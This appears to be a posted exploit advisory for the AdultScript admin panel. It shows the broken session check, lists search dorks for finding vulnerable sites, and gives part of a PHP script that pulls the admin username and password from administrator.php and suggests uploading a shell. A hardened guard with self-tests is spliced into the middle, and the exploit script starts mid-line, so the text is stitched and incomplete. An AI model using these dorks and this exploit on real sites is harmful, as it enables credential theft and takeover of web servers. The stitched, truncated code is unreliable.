Adult Script Unauthorized Administrative Access Exploit


Exploit Coded By Liz0ziM From BiyoSecurityTeam
Greetz My all friend and BiyoSecurityTeam User..
Software site: http://www.adultscript.net/
Demo: http://www.adultscript.net/demo/
Vulnerable code in admin/administrator.php near lines 5-8
if ( ($_SESSION['adminid']=="") && ($_SESSION['admintype'] !=1))
{
    header("Location: logout.php"); // Bypass Me :D
}
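
The guard above fails twice over: header() only queues a Location header and does not stop the script, so the rest of administrator.php is still rendered and sent, and the && skips the redirect whenever either session value looks valid. A hardened form of the check follows as an added example; it is not AdultScript's code, and is_admin_session() and require_admin() are hypothetical names.

```php
<?php
// Added example, not AdultScript's code. is_admin_session() and
// require_admin() are hypothetical helper names.
declare(strict_types=1);

function is_admin_session(array $s): bool
{
    $id   = $s['adminid']   ?? '';
    $type = $s['admintype'] ?? '';
    // Both must hold: a non-empty admin id AND admin type 1.
    return is_scalar($id) && (string)$id !== ''
        && is_scalar($type) && (string)$type === '1';
}

function require_admin(): void
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
    if (!is_admin_session($_SESSION)) {
        header('Location: logout.php', true, 302);
        exit; // header() alone does not end the script
    }
}

// Self-check on constructed session arrays; runs only from the PHP CLI.
if (PHP_SAPI === 'cli') {
    $cases = [
        [[], false],                                     // anonymous visitor
        [['adminid' => '7'], false],                     // id only: passed the original && test
        [['admintype' => 1], false],                     // type only: passed the original && test
        [['adminid' => '', 'admintype' => 1], false],    // empty id is not an id
        [['adminid' => '7', 'admintype' => '1'], true],  // real admin
    ];
    foreach ($cases as [$session, $expected]) {
        if (is_admin_session($session) !== $expected) {
            throw new RuntimeException('guard mismatch: ' . json_encode($session));
        }
    }
    echo "guard checks passed\n";
}
```

Call require_admin() as the first statement of every script under admin/. The exploit output below reads the username and password out of the returned page, so the admin form should also stop echoing the stored password into the HTML.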

Dork:
inurl:submit-user-link.html
inurl:video-listing-cat
inurl:hosted-videos
inurl:porn-listing-cat
"Powered By AdultScript.NET"
"Copyright 2007 [IAG].AdultScript.v1.5.Nulled"

"; sleep(1);
echo 'Sending Evil Code.......';
$kaynak=dosya_indir($adres."/admin/administrator.php");
sleep(5);
if(eregi('value="',$kaynak))
{
    echo "Exploit Has Been Succeful";
    preg_match_all($desen,$kaynak,$sonuc);
    echo "".$adres."/admin/";
    echo "Username :".htmlspecialchars($sonuc[1][0])."";
    echo "Password:".htmlspecialchars($sonuc[1][1])."";
    echo $adres."/admin/videolinks_view.php edit video and upload shell :)";
}
else
{
    echo "Exploit Has Been Failed!";
}
}
?>